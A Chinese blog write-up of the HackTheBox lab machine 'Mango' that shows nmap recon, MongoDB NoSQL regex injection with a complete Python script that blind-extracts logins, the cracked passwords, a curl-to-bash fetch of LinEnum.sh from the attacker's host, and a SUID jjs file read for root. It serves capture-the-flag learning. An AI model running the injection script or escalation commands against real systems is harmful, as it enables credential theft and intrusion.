CA01H'S BLOG

文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox-Retired

HackTheBox-Active

VulnHub

代码审计

PHP代码审计

大数据安全

机器学习

基础学习

Python

Python基础

Python安全

Java

Java基础

Java安全

算法

Leetcode

随笔

经验

技术

 2020-03-17   1.3k

HTB::Mongo Walkthrough

0x01 Information

0x02 Tools and Tips

  • Nmap
  • LinEnum.sh
  • gtfobins
  • MongoDB注入

0x03 Pentesting

Nmap扫描靶机端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
[email protected] ~ % nmap -A -Pn -T4 -p- 10.10.10.162
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 02:44 UTC
Nmap scan report for 10.10.10.162
Host is up (0.060s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.12 seconds

主要来看443端口,用https访问:

这个页面好像除了Analytics之外其他都是摆设

研究了会发现这个Analytics也是一个摆设,orz。。。回去再看看nmap扫描出来的端口又发现了一个信息

1
2
ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv
Ltd./stateOrProvinceName=None/countryName=IN

commonName: 公用名称,一般为网站域名

编辑/etc/hosts文件添加解析:

1
10.10.10.162   staging-order.mango.htb

看到了一个登录界面

好吧,这里有点坑,是基于MongoDB的NoSQL注入,试一下这里的Payload:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL Injection

注入成功后是这种界面:

没有什么可以利用的,现在回过头去爆破用户和密码,脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
import string
import requests

url = "http://staging-order.mango.htb/index.php"
headers = {"Host": "staging-order.mango.htb"}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\" + c  for c in string.punctuation]

def main():
    usernames = get_users()
    if usernames:
        print('Finished!')
        for username in usernames:
            password = get_password(username)
            print('{}:{}'.format(username, password))
    else:
        print('Not Found!')

def get_users():
    usernames = []
    payload = {"username[$regex]":"","password[$regex]":".*", "login":"login"}

    for c in possible_chars:
        username = "^" + c
        payload["username[$regex]"] = username + ".*"
        r = requests.post(url, data=payload, headers=headers, allow_redirects=False)
        if r.status_code == 302:
            print("username start with character:" + c)
            for x in range(0, get_username_length() - 1):
                for c2 in possible_chars:
                    payload["username[$regex]"] = username + c2 + ".*"
                    r2 = requests.post(url, data=payload, headers=headers, allow_redirects=False)
                    if r2.status_code == 302:
                        username += c2
                        print(username[1:])
                        break
                #if c2 == possible_chars[-1]:
            print("Found username: {}".format(username[1:]))
            usernames.append(username[1:])

    return usernames

def get_password(username):
    payload = {"username": username, "password[$regex]": "", "login": "login"}
    password = "^"
    
    for x in range(0, get_pass_length(username)):
        for c in possible_chars:
            payload["password[$regex]"] = password + c + ".*"
            r = requests.post(url, data=payload, headers=headers, allow_redirects=False)
            if r.status_code == 302:
                password += c
                print(password[1:])
                break
    password = password[1:].replace("\\", "")
    print("Found {}'s password: ".format(username) + password)
    return password

def get_username_length():
    length = 1
    while True:
        payload = {"username[$regex]": ".{{{}}}".format(length), "password[$ne]":"", "login":"login"}
        r =requests.post(url, data=payload, headers=headers, allow_redirects=False)
        if r.status_code == 302:
            length += 1
        else:
            return length -1

def get_pass_length(username):
    length = 1
    while True:
        payload = {"username": username, "password[$regex]": ".{{{}}}".format(length), "login": "login"}
        r = requests.post(url, data=payload, headers=headers, allow_redirects=False)
        if r.status_code == 302:
            length += 1
        else:
            return length -1

if __name__ == '__main__':
    main()

运行结果如下:

得到两个账户和密码:

1
2
mango:h3mXK8RhU~f{]f5H
admin:t9KcS3>!0B#2

登录mongo账户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
[email protected]:~/HTB/Boxes/Mango# ssh [email protected]
[email protected]'s password:
<...>
Last login: Mon Nov 11 20:58:31 2019 from 10.10.14.7
[email protected]:~$ su admin
Password:
$ whoami
admin
$ cd /home/admin
$ ls -la
total 24
drwxr-xr-x 2 admin admin 4096 Sep 30 03:20 .
drwxr-xr-x 4 root root 4096 Sep 27 14:02 ..
lrwxrwxrwx 1 admin admin 9 Sep 27 14:30 .bash_history -> /dev/null
-rw-r--r-- 1 admin admin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 admin admin 3771 Apr 4 2018 .bashrc
-rw-r--r-- 1 admin admin 807 Apr 4 2018 .profile
-r-------- 1 admin admin 33 Sep 27 14:29 user.txt

跑一个LinEnum.sh提权脚本看有没有什么可以利用的

1
2
3
4
5
6
[email protected]:/home/admin$ curl 10.10.14.42:80/LinEnum.sh | bash
<...>
[-] SGID files:
<...>
-rwsr-sr-- 1 root admin 10352 Jul 18 18:21 /usr/lib/jvm/java-11-openjdkamd64/
bin/jjs

也可以使用命令:find / -user root -perm -4000 2>/dev/null

查看利用方式:https://gtfobins.github.io/gtfobins/jjs/

1
2
3
4
5
6
7
[email protected]:/home/admin$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));
jjs> while ((line = br.readLine()) != null) { print(line); };
8a8efXXXXXXXXXXXXXXXXXXXXXXXXXb15

0x04 Summary

Mongo是一个主要考察NoSQL注入的的靶机,听这个靶机的名字就感觉数据库用的是MongoDB,为此笔者专门写了一个关于NoSQL注入之MongoDB文章,感兴趣的同学可以去看一看。这次主要考察NoSQL的盲注技巧,其实也没什么技巧,主要还是写脚本的能力吧,感觉还是不太行,需要调试很多次才能pass,但相信先模仿后创造,坚持自己动手写,应该还是没问题的。

  靶机->HTB
 
Expand all Back to top Go to bottom
Copyright © ca01h 2019-2021 | 本站总访问量